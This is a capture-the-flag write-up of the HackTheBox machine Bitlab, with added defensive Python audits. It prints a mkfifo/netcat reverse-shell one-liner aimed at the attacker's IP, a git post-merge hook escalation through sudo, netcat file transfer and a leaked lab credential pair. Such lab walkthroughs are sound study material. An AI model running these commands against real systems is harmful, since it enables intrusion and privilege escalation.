Bitlab — HackTheBox

Aleksi Kistauri
6 min read · Jan 11, 2020
https://www.hackthebox.eu/home/machines/profile/207

This is a write-up on how I solved Bitlab from HacktheBox.

Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.

About this box:

Bitlab is a medium-difficulty box. It was such a good and fun box because it demonstrated real-life setups and vulnerabilities: not outdated software versions, but the way boxes are set up (over-permissioned binaries, misconfigured or over-exposed network services, people sticking keys in places they really should not, etc.).

Recon:

Use Nmap to scan the target ports:

nmap: network exploration tool and security / port scanner
-sV: version detection
-sC: performs a script scan using the default set of scripts
-o: output file (nmap spells this -oN, -oX, -oG or -oA depending on the output format)

Only two ports are open, 22 and 80: SSH on port 22 and GitLab on port 80.

Even without directory enumeration with Gobuster, we already know there is a robots.txt with some disallowed entries.

If we look at the /help/ entry we will see bookmarks.html,

which contains several bookmark elements. One of them contains obfuscated data.

After deobfuscation, we have a username and password:

clave:11des0081x
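The bookmark hides its credentials behind JavaScript string obfuscation, which is exactly why it is not protection: anything the browser can decode, an analyst can decode. The following is an added example for this write-up, not code from the original post; it assumes the obfuscation is JavaScript string literals written as hex (\xNN) and unicode (\uNNNN) escapes, a common bookmarklet form, since the post does not show the actual payload. The sample bookmarklet and its values are constructed placeholders.

```python
"""Find and decode hex/unicode-escaped JavaScript string literals.

Added example for this write-up, not code from the original post. It assumes
the bookmark's obfuscation is JavaScript string literals written as \\xNN and
\\uNNNN escapes; the post does not show the real payload.
"""
import re

# A JS string literal: a quote, then escape pairs or non-quote chars, then the same quote.
JS_STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1)[^\\])*)\1""")
HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
UNI_ESC_RE = re.compile(r"\\u([0-9A-Fa-f]{4})")


def decode_js_escapes(literal_body):
    """Turn \\xNN and \\uNNNN escapes inside a JS string body into plain text."""
    literal_body = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal_body)
    return UNI_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal_body)


def find_obfuscated_literals(js_source, min_escapes=2):
    """Return the decoded body of every string literal that leans on escape sequences.

    Plain literals (fewer than min_escapes escapes) are skipped, so the output is
    only the strings somebody went out of their way to hide.
    """
    decoded = []
    for m in JS_STRING_RE.finditer(js_source):
        body = m.group(2)
        n_escapes = len(HEX_ESC_RE.findall(body)) + len(UNI_ESC_RE.findall(body))
        if n_escapes >= min_escapes:
            decoded.append(decode_js_escapes(body))
    return decoded


# Constructed bookmarklet in the style of an obfuscated "auto-fill the login form"
# bookmark. The values are placeholders, not the box's real credentials.
SAMPLE_BOOKMARKLET = (
    r'javascript:(function(){var _0xa=["\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E",'
    r'"\x65\x78\x61\x6D\x70\x6C\x65\x5F\x75\x73\x65\x72",'
    r'"\x45\x78\x61\x6D\x70\x6C\x65\x50\x61\x73\x73\x31\x32\x33"];'
    r'document.getElementById(_0xa[0]).value=_0xa[1];})()'
)

if __name__ == "__main__":
    for text in find_obfuscated_literals(SAMPLE_BOOKMARKLET):
        print(text)
```

Running it against the constructed bookmarklet prints the form field id followed by the placeholder username and password. The takeaway for anyone maintaining a help page like this: a bookmark that fills in a login form is a credential stored in cleartext, whatever encoding wraps it.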

And we are in!

After logging into GitLab we see that we have two projects and some snippets, and as user clave we can probably edit index.php in the Administrator/profile project.

Okay, time to get the Reverse shell.

Grab the PHP reverse shell from Pentestmonkey.

Then get your own IP address with ifconfig tun0

and change the IP address in the reverse shell accordingly.

And merge it:

After that, Set Netcat listener with:

nc -nvlp 1234

and to trigger the shell visit:

http://10.10.10.114/profile/index.php

And we are in!

As the www-data user we can run git pull through sudo, without needing root's password.

To get a reverse shell as root, all we need is to add a bash reverse shell to .git/hooks/post-merge; when sudo git pull merges something, Git runs that hook as root.

Let's clone the profile project (which we can edit as clave) into /tmp/.

It's all set.

Let’s get the reverse shell as a root!

Add a bash shebang to .git/hooks/post-merge:

echo "#!/bin/bash" > .git/hooks/post-merge

Append the reverse shell to .git/hooks/post-merge:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.137 1235 >/tmp/f" >> .git/hooks/post-merge

And give it execute permission

chmod +x .git/hooks/post-merge

Set up the listener with Netcat:

nc -nvlp 1235

And run:

sudo git pull

Whoops. The repository is already up to date.

To trigger the hook we need to make a change to the repository so that there is actually something to merge.

Edit README.md

And merge it.

Okay, now we can trigger it.

sudo git pull

And we are root without getting the user.
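The root cause here is not the hook but the sudo rule: any rule that lets a user run git as root turns every checkout that user controls into root code execution, because Git runs .git/hooks/* from the working copy it is pointed at. The following is an added example for this write-up, not the author's or GitLab's code, of the two checks an administrator would run to catch this configuration. It assumes a sudoers file in the standard `user HOST=(runas) [NOPASSWD:] command` form and a plain Git checkout; the sudoers fragment and the demo repository are constructed, and the demo hook only echoes a line.

```python
"""Audit: who may run `git pull` via sudo, and which hooks would run as root.

Added example for this write-up (not the author's or GitLab's code). It assumes
a sudoers file in the standard `user HOST=(runas) [NOPASSWD:] command` form and
a plain git checkout; all inputs below are constructed.
"""
import os
import re
import stat
import tempfile

SUDO_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)
# Matches git itself or `git pull` at the end of the command path.
GIT_PULL_RE = re.compile(r"(^|/)git(\s+pull\b|\s*$)")


def risky_git_pull_rules(sudoers_text):
    """Return (user, command, passwordless) for rules that run git / git pull as root.

    Any such rule is root code execution: git runs .git/hooks/* from whatever
    checkout the invoking user points it at, and that user controls the hooks.
    Blanket `ALL` commands are not reported; they are a separate finding.
    """
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        cmd = m.group("cmd").strip()
        if runas_user in ("root", "ALL") and GIT_PULL_RE.search(cmd):
            hits.append((m.group("user"), cmd, "NOPASSWD" in m.group("tags")))
    return hits


def executable_hooks(repo):
    """List executable, non-sample hooks with their owner uid and loose write bits."""
    hooks_dir = os.path.join(repo, ".git", "hooks")
    found = []
    if not os.path.isdir(hooks_dir):
        return found
    for name in sorted(os.listdir(hooks_dir)):
        path = os.path.join(hooks_dir, name)
        if name.endswith(".sample") or not os.path.isfile(path):
            continue  # git ignores *.sample, so the audit does too
        st = os.stat(path)
        if st.st_mode & stat.S_IXUSR:
            found.append({
                "hook": name,
                "owner_uid": st.st_uid,
                "group_or_world_writable": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
            })
    return found


# Constructed sudoers fragment; the www-data line mirrors the rule abused on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/git pull
alice ALL=(root) /usr/bin/systemctl restart nginx
"""


def build_demo_repo():
    """Create a throwaway checkout with one harmless executable post-merge hook."""
    repo = tempfile.mkdtemp(prefix="hookaudit-")
    hooks = os.path.join(repo, ".git", "hooks")
    os.makedirs(hooks)
    hook_path = os.path.join(hooks, "post-merge")
    with open(hook_path, "w") as f:
        f.write("#!/bin/sh\necho 'post-merge ran'\n")  # benign stand-in for a payload
    os.chmod(hook_path, 0o755)
    with open(os.path.join(hooks, "pre-commit.sample"), "w") as f:
        f.write("#!/bin/sh\n")
    return repo


if __name__ == "__main__":
    for user, cmd, nopasswd in risky_git_pull_rules(SAMPLE_SUDOERS):
        print(f"sudo rule: {user} -> {cmd} (NOPASSWD={nopasswd})")
    for hook in executable_hooks(build_demo_repo()):
        print("hook:", hook)
```

The fix is on the sudo side: drop the rule and let a dedicated deploy user own the checkout, or at minimum pin the rule to one repository path and set core.hooksPath for it to a root-owned directory so the invoking user cannot supply the hooks.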

¯\_(ツ)_/¯

Let's forget about that for now and get the user from www-data.

Remember the snippets in GitLab? Let's check them.

Bingo! We have one snippet with a database name, username, and password.

The snippet executes a query that returns all rows from the profiles table.

I believe the simplest way to execute it is to change index.php again (putting the snippet in it) and just trigger it from the browser.

By itself, it won't print any information from the query.

A quick Google search tells us how to display all the results.

Commit, merge and open it with the browser.

http://10.10.10.114/profile/index.php

Oh boy. We got the credentials.
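The snippet leaked because a working database connection, with its literal username and password, was checked into a place other GitLab users could read. The following is an added example for this write-up, not code from the post or from GitLab, showing a check that flags exactly that pattern in PHP source before it lands in a snippet or a commit. It assumes the connection is opened with PDO or mysqli_connect using literal strings; the two snippets below are constructed and their credential values are placeholders.

```python
"""Flag database credentials hard-coded in PHP source (snippets, index.php, ...).

Added example for this write-up, not code from the post or from GitLab. It
assumes the connection is opened with PDO or mysqli_connect using literal
strings; the sample snippets below are constructed with placeholder values.
"""
import re

# new PDO('dsn', 'user', 'password') with all three arguments as string literals
PDO_RE = re.compile(
    r"""new\s+PDO\s*\(\s*(['"])(?P<dsn>[^'"]*)\1\s*,\s*(['"])(?P<user>[^'"]*)\3"""
    r"""\s*,\s*(['"])(?P<password>[^'"]*)\5""",
    re.IGNORECASE,
)
# mysqli_connect('host', 'user', 'password') with literal arguments
MYSQLI_RE = re.compile(
    r"""mysqli_connect\s*\(\s*(['"])(?P<host>[^'"]*)\1\s*,\s*(['"])(?P<user>[^'"]*)\3"""
    r"""\s*,\s*(['"])(?P<password>[^'"]*)\5""",
    re.IGNORECASE,
)


def find_hardcoded_db_credentials(php_source):
    """Return one finding per literal-credential connection call.

    The password itself is never copied into the finding, only its length, so the
    report can be pasted into a ticket without re-leaking the secret.
    """
    findings = []
    for pattern, kind in ((PDO_RE, "PDO"), (MYSQLI_RE, "mysqli_connect")):
        for m in pattern.finditer(php_source):
            line_no = php_source.count("\n", 0, m.start()) + 1
            target = m.group("dsn") if kind == "PDO" else m.group("host")
            findings.append({
                "kind": kind,
                "line": line_no,
                "target": target,
                "user": m.group("user"),
                "password_length": len(m.group("password")),
            })
    return findings


# Constructed snippet with the shape of the "profiles" query; values are placeholders.
LEAKY_SNIPPET = """<?php
$db_connection = new PDO('mysql:host=localhost;dbname=profiles_example', 'example_user', 'EXAMPLE_ONLY');
$result = $db_connection->query('SELECT * FROM profiles');
"""

# Same logic with the secrets read from the environment: nothing literal to leak.
HARDENED_SNIPPET = """<?php
$db_connection = new PDO(getenv('DB_DSN'), getenv('DB_USER'), getenv('DB_PASSWORD'));
$result = $db_connection->query('SELECT * FROM profiles');
"""

if __name__ == "__main__":
    print(find_hardcoded_db_credentials(LEAKY_SNIPPET))    # one PDO finding on line 2
    print(find_hardcoded_db_credentials(HARDENED_SNIPPET)) # []
```

The hardened variant is not just cosmetic: with the credentials in the environment, the snippet can be shared, pasted into index.php, or committed without carrying a password with it, which is the property the leaked snippet lacked.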

Huh? Maybe the password is the whole text?

Okay, SSH in without decoding the value.

And we are in; we got the user clave.

Some reverse-engineering

We have RemoteConnection.exe in /home/clave/

Let's download it with Netcat and do some reverse-engineering with OllyDbg.

Set up a listener on our machine with:

nc -l -p 1234 > RemoteConnection.exe

and Send the file with:

nc -w 3 10.10.15.137 1234 < RemoteConnection.exe

And finally, check the integrity of the transfer by comparing the md5sum output on both sides.

We got the file.

Before debugging let’s run strings on it.

Hmm, nothing really interesting. Maybe it makes some SSH connection? I don't know.
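One reason strings comes up empty on a Windows executable is that the default pass only reports runs of printable ASCII bytes, while Windows programs commonly store text as UTF-16LE, where every character is followed by a NUL byte and so never forms a run; GNU strings needs -el to report those. The following is an added example for this write-up, not the post's own tooling, that implements both passes side by side. It assumes nothing about RemoteConnection.exe beyond its being a Windows PE; the byte blob is constructed to mimic a fragment of such a file, and the embedded command is a placeholder.

```python
"""Why `strings` can miss text in a Windows binary: ASCII vs UTF-16LE literals.

Added example for this write-up, not the post's own tooling. The byte blob below
is constructed to mimic a fragment of a PE file; nothing here is taken from
RemoteConnection.exe.
"""
import re


def ascii_strings(data, min_len=4):
    """What `strings` reports by default: runs of printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def utf16le_strings(data, min_len=4):
    """What `strings -el` reports: printable chars each followed by a NUL byte."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def build_sample_pe_fragment():
    """Constructed bytes: an ASCII import name plus a wide-string command line."""
    return (
        b"MZ" + b"\x90" * 6                       # DOS header stub, padding
        + b"kernel32.dll\x00"                     # ASCII: visible to plain strings
        + b"\xcc" * 5                             # int3 filler between sections
        + "ssh example_user@remote.example".encode("utf-16-le") + b"\x00\x00"
        + b"\xff" * 4
    )


def triage(data):
    """Return both views so the gap between them is obvious at a glance."""
    return {"ascii": ascii_strings(data), "utf16le": utf16le_strings(data)}


if __name__ == "__main__":
    for view, found in triage(build_sample_pe_fragment()).items():
        print(view, found)
```

On the constructed fragment the ASCII pass sees only kernel32.dll, while the UTF-16LE pass recovers the full command. Either way the lesson for whoever built such a tool is the same: a credential compiled into a binary is recoverable by anyone who can read the file, with or without a debugger.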

let’s see it with OllyDbg.

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. — http://www.ollydbg.de/

So, it does a comparison and, if the value matches, opens the connection.

Open it in OllyDbg and set a breakpoint on JNZ SHORT 00331662.

JNZ is a conditional jump (jump if not zero), so the result of that comparison decides whether the connection code runs.

And run it.

We have the command in the ESI register, and it contains the root password.

And we are root, AGAIN!

I hope you enjoyed!

Follow me for future posts.

Twitter — https://twitter.com/ls4cfk
